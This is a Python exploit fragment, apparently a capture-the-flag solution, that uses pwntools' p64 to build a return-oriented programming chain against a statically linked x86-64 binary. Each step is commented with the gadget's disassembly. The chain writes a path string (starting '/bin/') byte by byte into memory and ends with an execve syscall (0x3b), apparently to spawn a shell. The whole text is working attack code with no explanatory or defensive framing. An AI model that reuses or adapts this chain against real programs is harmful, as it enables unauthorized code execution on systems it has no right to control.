payload = p64(0x41ecb2)
#0x000000000041ecb2: pop rcx; ret; 
payload += p64(0x2f)+p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x447058)+p64(0x40b506)
# 0x000000000040b506: xchg ebp, eax; ret; 
payload += p64(0x420799)
# 0x0000000000420799: xchg edi, eax; ret; 
payload += p64(0x42dc95)
# 0x42dc95: add byte ptr [rdi], cl ; ret
payload += p64(0x41ecb2)
# 0x000000000041ecb2: pop rcx; ret; 
payload += p64(0x62)+p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x447059)+p64(0x40b506)
# 0x000000000040b506: xchg ebp, eax; ret; 
payload += p64(0x420799)
# 0x0000000000420799: xchg edi, eax; ret; 
payload += p64(0x42dc95)
# 0x42dc95: add byte ptr [rdi], cl ; ret
payload += p64(0x41ecb2)
# 0x000000000041ecb2: pop rcx; ret; 
payload += p64(0x69)+p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x44705a)+p64(0x40b506)
# 0x000000000040b506: xchg ebp, eax; ret; 
payload += p64(0x420799)
# 0x0000000000420799: xchg edi, eax; ret; 
payload += p64(0x42dc95)
# 0x42dc95: add byte ptr [rdi], cl ; ret
payload += p64(0x41ecb2)
# 0x000000000041ecb2: pop rcx; ret; 
payload += p64(0x6e)+p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x44705b)+p64(0x40b506)
# 0x000000000040b506: xchg ebp, eax; ret; 
payload += p64(0x420799)
# 0x0000000000420799: xchg edi, eax; ret; 
payload += p64(0x42dc95)
# 0x42dc95: add byte ptr [rdi], cl ; ret
payload += p64(0x41ecb2)
# 0x000000000041ecb2: pop rcx; ret; 
payload += p64(0x2f)+p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x44705c)+p64(0x40b506)
# 0x000000000040b506: xchg ebp, eax; ret; 
payload += p64(0x420799)
# 0x0000000000420799: xchg edi, eax; ret; 
payload += p64(0x42dc95)
# 0x42dc95: add byte ptr [rdi], cl ; ret
payload += p64(0x41ecb2)
# 0x000000000041ecb2: pop rcx; ret; 
payload += p64(0x66)+p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x44705d)+p64(0x40b506)
# 0x000000000040b506: xchg ebp, eax; ret; 
payload += p64(0x420799)
# 0x0000000000420799: xchg edi, eax; ret; 
payload += p64(0x42dc95)
# 0x42dc95: add byte ptr [rdi], cl ; ret
payload += p64(0x41ecb2)
# 0x000000000041ecb2: pop rcx; ret; 
payload += p64(0x68)+p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x44705e)+p64(0x40b506)
# 0x000000000040b506: xchg ebp, eax; ret; 
payload += p64(0x420799)
# 0x0000000000420799: xchg edi, eax; ret; 
payload += p64(0x42dc95)
# 0x42dc95: add byte ptr [rdi], cl ; ret
payload += p64(0x41ecb2)
# 0x000000000041ecb2: pop rcx; ret; 
payload += p64(0x0)+p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x44705f)+p64(0x40b506)
# 0x000000000040b506: xchg ebp, eax; ret; 
payload += p64(0x420799)
# 0x0000000000420799: xchg edi, eax; ret; 
payload += p64(0x42dc95)
# 0x42dc95: add byte ptr [rdi], cl ; ret
payload += p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x447058)+p64(0x40b506)
# 0x000000000040b506: xchg ebp, eax; ret; 
payload += p64(0x420799)
# 0x0000000000420799: xchg edi, eax; ret; 
payload += p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x0)+p64(0x40b506)
# 0x000000000040b506: xchg ebp, eax; ret; 
payload += p64(0x4367db)
# 0x00000000004367db: xchg edx, eax; ret 0x148; 
payload += p64(0x4011ad)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x4471c4)+p64(0x4011a9)
# 0x4011a9: pop rsi ; add al, 0 ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x0)+p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x3b)+p64(0x40b506)
# 0x000000000040b506: xchg ebp, eax; ret; 
payload += p64(0x40ad65)
# 0x000000000040ad65: syscall; 
payload += b''
